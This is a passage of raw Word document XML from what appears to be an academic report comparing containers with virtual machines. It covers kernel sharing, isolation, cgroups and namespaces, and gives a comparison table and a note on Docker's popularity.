        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:instrText xml:space="preserve"> CITATION ABh21 \l 2057  \m GRa19</w:instrText>
          </w:r>
          <w:r w:rsidR="00A3296F">
            <w:instrText xml:space="preserve"> \m DSa20</w:instrText>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[6, 7, 8]</w:t>
          </w:r>
          <w:r w:rsidR="002D73C7">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00065606">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCD69C9" w14:textId="1E65206A" w:rsidR="00EA29BA" w:rsidRDefault="00EA29BA" w:rsidP="001C368B">
      <w:r>
        <w:t xml:space="preserve">However, containers </w:t>
      </w:r>
      <w:r w:rsidR="000A1102">
        <w:t xml:space="preserve">are not versatile </w:t>
      </w:r>
      <w:r w:rsidR="00B81CBA">
        <w:t>to run diverse OS</w:t>
      </w:r>
      <w:r w:rsidR="006060C7">
        <w:t xml:space="preserve"> comparing to hypervisors. </w:t>
      </w:r>
      <w:r w:rsidR="00D97681">
        <w:t>Because</w:t>
      </w:r>
      <w:r w:rsidR="006060C7">
        <w:t xml:space="preserve"> they are designed to use the same OS as the parent or host OS</w:t>
      </w:r>
      <w:r w:rsidR="00D97681">
        <w:t xml:space="preserve">, a container created on a windows host machine can only support windows applications. As such, containers are applicable to </w:t>
      </w:r>
      <w:r w:rsidR="00E93B4C">
        <w:t xml:space="preserve">run various </w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>ms</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve"> of application only on a single OS platform. Furthermore, containers are vulnerable to more attacks than hypervisors as all share the host’s resources, including memory, CPU, and kernel</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve"> directly. However, Linux-based containers use </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="008E275B">
        <w:t xml:space="preserve">groups and namespace </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00ED6575">
        <w:lastRenderedPageBreak/>
        <w:t>Linux features to secure them. The namespace provides separation while the Cgroups</w:t>
      </w:r>
      <w:r w:rsidR="00C719D9">
        <w:t xml:space="preserve"> manag</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="00C719D9">
        <w:t xml:space="preserve"> the resources, such as memory, CPU, and network</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1206441161"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:instrText xml:space="preserve"> CITATION OBe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00F946D2">
            <w:instrText xml:space="preserve"> \m MMo20</w:instrText>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[9, 10]</w:t>
          </w:r>
          <w:r w:rsidR="002F096E">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00C719D9">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00937603">
        <w:t xml:space="preserve"> Figure 2 illustrates the system architecture of containerisation and virtual machines (VMs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDFBA4D" w14:textId="64F0257D" w:rsidR="00DE7581" w:rsidRDefault="00DE7581" w:rsidP="00DE7581">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F057914" wp14:editId="06B75871">
            <wp:extent cx="4347210" cy="2374900"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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7210" cy="2374900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDB2664" w14:textId="2684909F" w:rsidR="00B933F3" w:rsidRDefault="00B933F3" w:rsidP="00B933F3">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc86858593"/>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B933F3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: Virtual Machine (VM) Vs Containerisation architecture</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1765726815"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION OBe21 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00B933F3">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[9]</w:t>
          </w:r>
          <w:r w:rsidRPr="00B933F3">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="17234BC9" w14:textId="7F2BE7A0" w:rsidR="00B04351" w:rsidRDefault="009116A4" w:rsidP="00F36AB4">
      <w:r>
        <w:t>However, both VM and container-based virtualisation techniques are designed for different use cases using various methods. There are several differences between these them.</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> For example, containers do not support multiple kernels since they rely on the kernel to create virtualisation. Moreover, containers can boot up faster than VM. They also consume </w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>less</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> resources compar</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidR="00B06579">
        <w:t xml:space="preserve"> to VMs. However, they are less secure than VMs</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1818682271"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:instrText xml:space="preserve"> CITATION QZh18 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r w:rsidR="00101E3B">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00B06579">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00810BF5">
        <w:t xml:space="preserve"> Table 1 summar</w:t>
      </w:r>
      <w:r w:rsidR="00755836">
        <w:t>ises</w:t>
      </w:r>
      <w:r w:rsidR="00810BF5">
        <w:t xml:space="preserve"> the comparison between the VM and </w:t>
      </w:r>
      <w:r w:rsidR="00B04351">
        <w:t>containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2231E0EA" w14:textId="25CDCDED" w:rsidR="00B04351" w:rsidRPr="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00C121FC">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc86858663"/>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: differences between containers and VM</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:b/>
            <w:bCs/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:color w:val="000000" w:themeColor="text1"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-218910822"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION ANJ15 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">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[12]</w:t>
          </w:r>
          <w:r w:rsidR="00EB2DD4" w:rsidRPr="00101E3B">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:i w:val="0"/>
              <w:iCs w:val="0"/>
              <w:color w:val="000000" w:themeColor="text1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00C121FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9209" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="3685"/>
        <w:gridCol w:w="3544"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B04351" w14:paraId="46E71AF6" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692117C0" w14:textId="6E8E3C3C" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="359915A4" w14:textId="39E5093E" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Containers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CDFF5D7" w14:textId="7F921F78" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>VM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04351" w14:paraId="211D4B68" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23FF15CC" w14:textId="5997F4AC" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BF3F55A" w14:textId="6963FAE1" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Less performance overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="291837B1" w14:textId="0FC0E818" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>High performance Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B04351" w14:paraId="5F74B586" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190E6306" w14:textId="2AA08F2B" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F9A1F6" w14:textId="2BE72478" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Supports single kernel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC750D5" w14:textId="399BE5FF" w:rsidR="00B04351" w:rsidRDefault="00B04351" w:rsidP="00B04351">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Multiple kernel’s</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="3772F5A4" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AF4CE28" w14:textId="66D37F44" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C9594E6" w14:textId="02B672CC" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Less isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="617DF027" w14:textId="26A60742" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Provides high level of isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="748DF593" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="503847D6" w14:textId="114D3400" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Booting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A28D022" w14:textId="188DD793" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Faster</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AC577B4" w14:textId="7EDAEEA3" w:rsidR="00BC57E9" w:rsidRDefault="00BC57E9" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Slower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC57E9" w14:paraId="6ED2EF07" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31FB0298" w14:textId="6182B89E" w:rsidR="00BC57E9" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Mobility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="059F40C3" w14:textId="724270FF" w:rsidR="00BC57E9" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Fast and easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49842D84" w14:textId="198FB02F" w:rsidR="00BC57E9" w:rsidRDefault="00101E3B" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>S</w:t>
            </w:r>
            <w:r w:rsidR="00C121FC">
              <w:t>lower</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C121FC" w14:paraId="0FB0FB8F" w14:textId="77777777" w:rsidTr="00BC57E9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69565178" w14:textId="6CD1E95C" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3685" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F805D7C" w14:textId="7AFE9B21" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Supports single OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A8F1F4F" w14:textId="0B394910" w:rsidR="00C121FC" w:rsidRDefault="00C121FC" w:rsidP="00BC57E9">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="1395"/>
              </w:tabs>
            </w:pPr>
            <w:r>
              <w:t>Supports multiple OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2B6548E9" w14:textId="681987AF" w:rsidR="00F36AB4" w:rsidRDefault="00B06579" w:rsidP="00F36AB4">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D58B34" w14:textId="68FBFB6A" w:rsidR="004A0407" w:rsidRDefault="00A1477F" w:rsidP="004A0407">
      <w:r>
        <w:t>Containerisation has become more common in the cloud industry and replac</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>es</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the traditional virtualisation method due to its portability, </w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t>flexibility</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t xml:space="preserve"> and cost-effective</w:t>
      </w:r>
      <w:r w:rsidR="006111C6">
        <w:t>ness</w:t>
      </w:r>
      <w:r w:rsidR="00AF71E0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t xml:space="preserve"> There are many </w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:lastRenderedPageBreak/>
        <w:t>container formats, such as Docker, Linux Containers (LXC), and rkt.</w:t>
      </w:r>
      <w:r w:rsidR="00471080">
        <w:t xml:space="preserve"> However,</w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t xml:space="preserve"> Docker is an open source and most </w:t>
      </w:r>
      <w:r w:rsidR="002A6F05">
        <w:t xml:space="preserve">popular </w:t>
      </w:r>
      <w:r w:rsidR="00F82977">
        <w:t>tool in the containerisation industry</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="795491614"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:instrText xml:space="preserve"> CITATION XXi17 \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="002A6F05">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00D77023">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00D77023" w:rsidRPr="00D77023">
            <w:rPr>
